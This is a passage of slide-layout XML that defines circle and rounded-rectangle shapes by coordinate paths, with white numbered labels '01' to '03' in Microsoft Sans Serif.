                  <a:pt x="546662" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506250" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463412" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418498" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371855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700910" y="6288404"/>
            <a:ext cx="3454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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>02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501139" y="7338059"/>
            <a:ext cx="744220" cy="748665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="744219" h="748665">
                <a:moveTo>
                  <a:pt x="371855" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="325213" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280299" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237461" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197049" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159411" y="67034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124896" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93851" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66627" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43571" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25031" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11357" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2897" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="374142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2897" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11357" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25031" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43571" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66627" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93851" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124896" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159411" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197049" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237461" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280299" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325213" y="745368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371855" y="748284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418498" y="745368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463412" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506250" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546662" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584300" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618815" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649860" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677084" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700140" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718680" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732354" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740814" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="743711" y="374142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740814" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732354" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718680" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="700140" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="677084" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649860" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618815" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584300" y="67034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546662" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506250" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="463412" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418498" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371855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700910" y="7518018"/>
            <a:ext cx="3454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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>03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374123" y="5215128"/>
            <a:ext cx="745490" cy="748665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="745490" h="748664">
                <a:moveTo>
                  <a:pt x="372618" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="325887" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280886" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237964" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197471" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159755" y="67034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125168" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94057" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66774" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43668" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25087" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11383" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2904" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="374142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2904" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11383" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25087" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43668" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66774" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94057" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125168" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159755" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197471" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237964" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280886" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325887" y="745368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372618" y="748284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419348" y="745368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464349" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507271" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547764" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585480" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620067" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651178" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678461" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701567" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720148" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="733852" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742331" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745235" y="374142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742331" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="733852" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720148" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701567" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678461" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651178" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620067" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585480" y="67034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547764" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507271" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464349" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419348" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372618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9575038" y="5394705"/>
            <a:ext cx="3454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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>01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374123" y="6798564"/>
            <a:ext cx="745490" cy="748665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="745490" h="748665">
                <a:moveTo>
                  <a:pt x="372618" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="325887" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280886" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237964" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197471" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159755" y="67034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125168" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94057" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66774" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43668" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25087" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11383" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2904" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="374142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2904" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11383" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25087" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43668" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66774" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94057" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125168" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159755" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197471" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237964" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280886" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325887" y="745368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372618" y="748284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419348" y="745368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464349" y="736857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507271" y="723099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547764" y="704446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585480" y="681249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620067" y="653857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651178" y="622623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678461" y="587895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701567" y="550026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720148" y="509365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="733852" y="466264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742331" y="421072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745235" y="374142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="742331" y="327211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="733852" y="282019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="720148" y="238918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701567" y="198257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678461" y="160388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="651178" y="125660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620067" y="94426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585480" y="67034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="547764" y="43837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507271" y="25184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464349" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419348" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372618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9575038" y="6978777"/>
            <a:ext cx="3454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0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>02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117853" y="4386834"/>
            <a:ext cx="7274559" cy="4090670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7274559" h="4090670">
                <a:moveTo>
                  <a:pt x="0" y="681736"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1711" y="633044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6769" y="585277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15057" y="538550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26461" y="492978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40865" y="448677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58154" y="405763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78213" y="364349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100926" y="324553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126178" y="286488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153854" y="250270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183838" y="216015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216015" y="183838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250270" y="153854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286488" y="126178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324553" y="100926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364349" y="78213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405763" y="58154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448677" y="40865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492978" y="26461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538550" y="15057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585277" y="6769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="633044" y="1711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681735" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6592316" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6641007" y="1711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6688774" y="6769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6735501" y="15057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6781073" y="26461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6825374" y="40865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6868288" y="58154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6909702" y="78213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6949498" y="100926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6987563" y="126178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7023781" y="153854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058036" y="183838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7090213" y="216015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7120197" y="250270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7147873" y="286488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7173125" y="324553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7195838" y="364349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7215897" y="405763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7233186" y="448677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7247590" y="492978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7258994" y="538550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7267282" y="585277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7272340" y="633044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7274052" y="681736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7274052" y="3408679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7272340" y="3457365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7267282" y="3505127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7258994" y="3551850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7247590" y="3597419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7233186" y="3641717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7215897" y="3684631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7195838" y="3726043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7173125" y="3765840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7147873" y="3803905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7120197" y="3840124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7090213" y="3874380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058036" y="3906559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7023781" y="3936545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6987563" y="3964223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6949498" y="3989477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6909702" y="4012192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6868288" y="4032253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6825374" y="4049544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6781073" y="4063950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6735501" y="4075356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6688774" y="4083645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6641007" y="4088704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6592316" y="4090416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681735" y="4090416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="633044" y="4088704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585277" y="4083645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538550" y="4075356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492978" y="4063950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448677" y="4049544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405763" y="4032253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364349" y="4012192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324553" y="3989477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286488" y="3964223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250270" y="3936545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216015" y="3906559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183838" y="3874380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153854" y="3840124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126178" y="3803905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100926" y="3765840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78213" y="3726043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58154" y="3684631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40865" y="3641717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26461" y="3597419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15057" y="3551850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6769" y="3505127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1711" y="3457365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3408679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="681736"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="427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885681" y="4420361"/>
            <a:ext cx="6833870" cy="4090670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6833869" h="4090670">
                <a:moveTo>
                  <a:pt x="0" y="681736"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1711" y="633044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6769" y="585277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15057" y="538550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26461" y="492978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40865" y="448677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58154" y="405763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78213" y="364349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100926" y="324553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126178" y="286488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153854" y="250270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183838" y="216015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216015" y="183838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250270" y="153854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286488" y="126178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324553" y="100926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364349" y="78213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405763" y="58154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448677" y="40865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492978" y="26461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538550" y="15057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585277" y="6769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="633044" y="1711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681736" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151880" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6200571" y="1711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6248338" y="6769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6295065" y="15057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6340637" y="26461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6384938" y="40865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6427852" y="58154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6469266" y="78213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509062" y="100926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6547127" y="126178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6583345" y="153854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617600" y="183838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6649777" y="216015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6679761" y="250270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6707437" y="286488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6732689" y="324553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6755402" y="364349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6775461" y="405763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6792750" y="448677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6807154" y="492978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6818558" y="538550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6826846" y="585277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6831904" y="633044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6833616" y="681736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6833616" y="3408679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6831904" y="3457365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6826846" y="3505127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6818558" y="3551850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6807154" y="3597419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6792750" y="3641717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6775461" y="3684631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6755402" y="3726043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6732689" y="3765840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6707437" y="3803905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6679761" y="3840124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6649777" y="3874380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6617600" y="3906559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6583345" y="3936545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6547127" y="3964223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509062" y="3989477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6469266" y="4012192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6427852" y="4032253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6384938" y="4049544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6340637" y="4063950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6295065" y="4075356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6248338" y="4083645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6200571" y="4088704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6151880" y="4090416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681736" y="4090416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="633044" y="4088704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585277" y="4083645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538550" y="4075356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492978" y="4063950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448677" y="4049544"/>
